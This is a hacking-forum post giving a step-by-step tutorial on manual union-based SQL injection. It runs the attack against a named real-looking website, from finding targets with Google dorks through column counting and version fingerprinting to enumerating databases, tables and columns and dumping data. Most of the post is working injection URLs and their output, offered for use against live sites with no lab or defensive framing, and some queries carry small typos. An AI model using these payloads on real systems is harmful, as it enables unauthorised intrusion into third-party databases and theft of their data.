SQLi/Dork MANUALLY INJECTING SQL/i (1 Viewer)

[NoneKnowofMI6]

We will therefore divide ourselves into several chapters.
/Chapter 1:Finding a sql flaw
For the moment nothing more simple, you will have to search on google lists of dorks for injection sql (a recent list preferably).
So this list is going to help us sort through, sort of sort of what kind of site we’re going to need. So I took:
Code:
category_list.php? id=

Please note that for a sql injection a site will always have to end this way:
Code:
id=alltransferable numbers

So I come across this url:
Code:
www.interplay.com/games/support.php? id=42

To check if the page is vulnerable, add a quote at the end of your url:
Code:
www.interplay.com/games/support.php? id=42'

I get the following error message:

1064: Vous avez une erreur dans votre SQL syntax; Check the manual that corresponds to your MySQL server version for the right syntax to use near ' ' ORDER BY release_date DESC' at line 1

The site is therefore very vulnerable.

/Chapter 2:Finding the Column Number in the DB

Now that we have found a flaw, we will have to find the number of columns in the DB.

I will remove the quotation mark and add the following code
Code:
order by 1--
The site is recovering normally and I will continue to put the code while changing the number until I get an error:
http://www.interplay.com/games/support.php?id=42 order by 1-- /No error
http://www.interplay.com/games/support.php?id=42 order by 2-- /No error
http://www.interplay.com/games/support.php?id=42 order by 3-- /No error
http://www.interplay.com/games/support.php?id=42 order by 4-- /No error
http://www.interplay.com/games/support.php?id=42 order by 5-- /No error
http://www.interplay.com/games/support.php?id=42 order by 6-- /No error
http://www.interplay.com/games/support.php?id=42 order by 7-- /No error
http://www.interplay.com/games/support.php?id=42 order by 8-- /No error
http://www.interplay.com/games/support.php?id=42 order by 9-- /No error
http://www.interplay.com/games/support.php?id=42 order by 11-- /No error
http://www.interplay.com/games/support.php?id=42 order by 12-- /No error
http://www.interplay.com/games/support.php?id=42 order by 13-- /No error
http://www.interplay.com/games/support.php?id=42 order by 14-- /No error
http://www.interplay.com/games/support.php?id=42 order by 15-- /No error
http://www.interplay.com/games/support.php?id=42 order by 16-- /No error
http://www.interplay.com/games/support.php?id=42 order by 17-- /No error
http://www.interplay.com/games/support.php?id=42 order by 18-- /No error
http://www.interplay.com/games/support.php?id=42 order by 19-- /No error
http://www.interplay.com/games/support.php?id=42 order by 20-- /ERROR

Page 20 indicates an error of this type
Code:
1054: Unknown column '20' in 'order clause'

So I take all the numbers before that, which makes us 19 columns.

/Chapter 3:Finding Accessible Columns
Now that we have determined the number of columns (19) it is necessary to determine which ones we can under-draw information.

So I will delete everything after id=42 and I will add this.

Code:
id=-42 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

Please note to place the - behind the number after id.


So we have chosen all the columns and if you press enter you will see some numbers including 2,17,8 and 9.
/Chapter 4:Finding the MySql version
The injection will not be possible if the MySql version is below 5.

To find the version of Mysql nothing simpler.
Replace one of the numbers that appeared on the page (so you have the choice between 2 , 17 , 8 and 9) and add the following code
Code:
http://www.interplay.com/games/support.php?id=-42 union select 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

Or this one

Code:
http://www.interplay.com/games/support.php?id=-42 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

So I chose the number 2.

The version of MySql is: 5.5.38

Injection is therefore possible.

/Chapter 5:Finding the/the name of the/the DB
Now we will inject the site to find the name of the BD will replace @@version or version()

by
Code:
group_concat(schema_name)

and add between the end number and the quotes

Code:
from information_schema.schemata

What gives
Code:
http://www.interplay.com/games/support.php?id=-42 union select 1,group_concat(schema_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.schemata--

Be careful not to forget the space between the 19 and from because otherwise it will not work.

So we have 2 DB:
-information_schema
-interplay


/Chapter 6:Finding the DB we will use

This operation will list the name(s) of the BD
To see which one we’re using, we’ll replace

Code:
group_concat(schema_name)

by

Code:
concat(database())

and delete from information_schema.schemata

The result is:

Code:
http://www.interplay.com/games/support.php?id=-42 union select 1,concat(database)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--



The site shows us only interplay.
So we use interplay DB.


/Chapter 7:Finding the Table Names

To get the names of the DB tables, we must replace

Code:
concat(database())

by

Code:
group_concat(table_name)

and add


Code:
from information_schema.tables where table_schema=database()

Between the last number and the two quotes.

Be careful not to stick the from with the 19
The result is:

Code:
http://www.interplay.com/games/support.php?id=-42 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.tables where table_schema=database()-

All tables are then listed, each separated by a comma

Here are the tables:

banners,banners_banner_id_seq,careers,careers_career_id_seq,downloads,franchises,franchises_franchise_id_seq,news,news_news_id_seq,screenshots,screenshots_screenshot_id_seq,titles,titles_title_id_seq



Rate them as they will be useful.

/Chapter 8:Finding the Column Names

We will proceed in the same way to find the names of the columns. That is to say that we will just change

Code:
table_name

by

Code:
column_name

and change


Code:
information_schema.tables


by

Code:
information_schema.columns


This is relatively simple.


The column names are then displayed in the same way as for the tables:

banner_id,title,release_date,expires_date,visible,imagefilename,slot_name,weight,language,link_url,width,height,id,career_id,created,visible,title,location,summary,description,language,id,download_id,filename,name,release_date,supportfile,category,franchise_id,name,visible,description,language,id,news_id,visible,display_date,expires_date,t


/Chapter 9:Getting Information
Go last straight.

Replace

Code:
group_concat(column_name)

by

Code:
(Columnname,0x3a,columnname,0x3a)

and

Code:
from information_schema.columns where table_schema=database()

by

Code:
from databasename.tablename

Note: Anything in red should be replaced.

For example if I want banner_id and title columns

So I say this:

Code:
http://www.interplay.com/games/support.php?id=-42 union select 1,group_concat(banner_id,0x3a,title,0x3a),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from interplay.banners--

Normally the page will show you the information.


If the page puts you

1054: Unknown column 'banner_id' in 'field list'

It’s just that the columns are not in the right table so you will have to look for which table is banner_id and which table is title.

That’s all for me I leave you big kiss to all:=P(love)

Click to read more...